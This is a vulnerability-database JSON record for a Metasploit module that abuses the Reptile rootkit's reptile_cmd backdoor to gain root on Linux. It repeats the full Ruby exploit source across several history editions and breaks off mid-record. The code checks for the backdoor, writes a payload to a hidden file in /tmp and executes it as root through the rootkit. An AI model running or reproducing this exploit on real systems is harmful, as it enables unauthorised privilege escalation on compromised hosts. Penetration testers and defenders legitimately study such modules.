{"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-06-03T13:01:39", "history": [{"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2019-12-22T19:24:25", "history": [], "viewCount": 18, "enchantments": {"dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:2980718249933760573", "KITPLOIT:8012947773668067243", "KITPLOIT:4016420172389198029", "KITPLOIT:6663018635486216690"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2698-1"]}, {"type": "f5", "idList": ["F5:K06747393", "F5:K59957337"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:400D28FE44174674BB4561AA9416F532"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:173836DF8EED925F6AF9FFE4825E4974"]}, {"type": "securelist", "idList": ["SECURELIST:5F1DADFFB008FB0B98F40C1DC138AF11"]}, {"type": "talosblog", "idList": ["TALOSBLOG:8DB6614E6048947EDBBD91681EE32AB7"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-4326"]}, {"type": "nessus", "idList": ["FEDORA_2019-6BF27B45B3.NASL", "DEBIAN_DLA-2043.NASL", "ALA_ALAS-2019-1327.NASL", "REDHAT-RHSA-2019-4326.NASL", "CISCO-SA-20190306-NXOS-CMDINJ-1608.NASL", "SUSE_SU-2019-3341-1.NASL", "SUSE_SU-2019-3348-1.NASL", "SLACKWARE_SSA_2019-353-01.NASL"]}], "modified": "2019-12-22T19:24:25"}, "score": {"value": -0.0, "vector": "NONE", "modified": "2019-12-22T19:24:25"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-12-22T19:24:25", "differentElements": ["sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-07T17:30:03", "history": [], "viewCount": 18, "enchantments": {"dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:614050EE655E01CE4F14F63F02D51FCF"]}, {"type": "redhat", "idList": ["RHSA-2020:0036", "RHSA-2020:0027"]}, {"type": "thn", "idList": ["THN:72A5D71BAB2248262B7A53E955BB655D"]}, {"type": "schneier", "idList": ["SCHNEIER:B602ADD863980C9FCB3BCEBDAA2391A4"]}, {"type": "mskb", "idList": ["KB4505220"]}, {"type": "ubuntu", "idList": ["USN-4226-1", "USN-4225-1", "USN-4227-1", "USN-4228-1"]}, {"type": "ics", "idList": ["ICSMA-19-274-01"]}, {"type": "cve", "idList": ["CVE-2019-18625", "CVE-2019-19585", "CVE-2020-5513", "CVE-2019-9468", "CVE-2019-9470", "CVE-2019-9471", "CVE-2019-9469"]}, {"type": "krebs", "idList": ["KREBS:CE3C8FD94629336B7B2F08A25E938C1E"]}], "modified": "2020-01-07T17:30:03"}, "score": {"value": 5.1, "vector": "NONE", "modified": "2020-01-07T17:30:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-07T17:30:03", "differentElements": ["sourceData"], "edition": 2}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-07T21:39:24", "history": [], "viewCount": 18, "enchantments": {"dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:00D23B55537D30A2F2BE05DA9507449A", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:614050EE655E01CE4F14F63F02D51FCF"]}, {"type": "hackerone", "idList": ["H1:769716"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:E93608F5086AF0D25317959574AD0EA7"]}, {"type": "redhat", "idList": ["RHSA-2020:0036"]}, {"type": "thn", "idList": ["THN:72A5D71BAB2248262B7A53E955BB655D"]}, {"type": "schneier", "idList": ["SCHNEIER:B602ADD863980C9FCB3BCEBDAA2391A4"]}, {"type": "mskb", "idList": ["KB4505220"]}, {"type": "ubuntu", "idList": ["USN-4226-1", "USN-4228-2", "USN-4227-2", "USN-4228-1", "USN-4227-1", "USN-4225-1"]}, {"type": "talos", "idList": ["TALOS-2019-0973"]}, {"type": "ics", "idList": ["ICSMA-19-274-01"]}, {"type": "cve", "idList": ["CVE-2019-18625", "CVE-2019-19585", "CVE-2020-5513"]}], "modified": "2020-01-07T21:39:24"}, "score": {"value": 5.3, "vector": "NONE", "modified": "2020-01-07T21:39:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-07T21:39:24", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-09T11:52:26", "history": [], "viewCount": 18, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "thn", "idList": ["THN:3BF99601CBB2D0D4323294B44C8C3D96"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5508"]}, {"type": "cve", "idList": ["CVE-2011-5250", "CVE-2011-5247", "CVE-2019-9812", "CVE-2019-17009", "CVE-2020-0004", "CVE-2016-5346", "CVE-2020-0008", "CVE-2020-0007", "CVE-2020-0001", "CVE-2020-0003"]}, {"type": "threatpost", "idList": ["THREATPOST:F443273374F12F1C3939D4492D11C675"]}], "modified": "2020-01-09T11:52:26"}, "score": {"value": 5.8, "vector": "NONE", "modified": "2020-01-09T11:52:26"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-09T11:52:26", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-09T13:41:50", "history": [], "viewCount": 20, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:9095423242991067820"]}, {"type": "thn", "idList": ["THN:3BF99601CBB2D0D4323294B44C8C3D96"]}, {"type": "talosblog", "idList": ["TALOSBLOG:F7B342EC9F291B6DA0EA3EF303DF31AE"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5508"]}, {"type": "cve", "idList": ["CVE-2011-5250", "CVE-2011-5247", "CVE-2019-17009", "CVE-2019-9812", "CVE-2020-0004", "CVE-2016-5346", "CVE-2020-0008", "CVE-2020-0007", "CVE-2020-0001", "CVE-2020-0003"]}, {"type": "threatpost", "idList": ["THREATPOST:F443273374F12F1C3939D4492D11C675"]}], "modified": "2020-01-09T13:41:50"}, "score": {"value": 3.9, "vector": "NONE", "modified": "2020-01-09T13:41:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-09T13:41:50", "differentElements": ["sourceData"], "edition": 5}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-13T01:34:05", "history": [], "viewCount": 20, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "avleonov", "idList": ["AVLEONOV:E4282EE7F282C86320DF8912B47DF172"]}, {"type": "kitploit", "idList": ["KITPLOIT:2141540753219230573", "KITPLOIT:7407076458453912634"]}, {"type": "krebs", "idList": ["KREBS:250E481D04272F446ED49B6AA2EA4C1C"]}, {"type": "cve", "idList": ["CVE-2020-6835", "CVE-2012-4284", "CVE-2019-18194", "CVE-2020-6162", "CVE-2019-4508"]}, {"type": "d2", "idList": ["D2SEC_VISCOSITY"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:576DA2C38108E6A710FD16F21C46538E"]}, {"type": "threatpost", "idList": ["THREATPOST:0675FD2F1907119072EAFF965E2B7E2C"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:971FEABEB6DA17E9D4D3137981B2B685"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2064-1:FCB7D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:D44D4A467C76DBF910B545640D073425"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-4600.NASL", "OPENSUSE-2020-2.NASL", "VMWARE_HORIZON_VIEW_AGENT_VMSA-2019-0023.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892062"]}], "modified": "2020-01-13T01:34:05"}, "score": {"value": 3.8, "vector": "NONE", "modified": "2020-01-13T01:34:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-13T01:34:05", "differentElements": ["sourceData"], "edition": 6}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-13T03:48:23", "history": [], "viewCount": 20, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "avleonov", "idList": ["AVLEONOV:E4282EE7F282C86320DF8912B47DF172"]}, {"type": "kitploit", "idList": ["KITPLOIT:2141540753219230573", "KITPLOIT:7407076458453912634"]}, {"type": "krebs", "idList": ["KREBS:250E481D04272F446ED49B6AA2EA4C1C"]}, {"type": "cve", "idList": ["CVE-2020-6835", "CVE-2012-4284", "CVE-2019-18194", "CVE-2020-6162", "CVE-2019-4508"]}, {"type": "d2", "idList": ["D2SEC_VISCOSITY"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:576DA2C38108E6A710FD16F21C46538E"]}, {"type": "threatpost", "idList": ["THREATPOST:0675FD2F1907119072EAFF965E2B7E2C"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:971FEABEB6DA17E9D4D3137981B2B685"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2064-1:FCB7D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:D44D4A467C76DBF910B545640D073425"]}, {"type": "nessus", "idList": 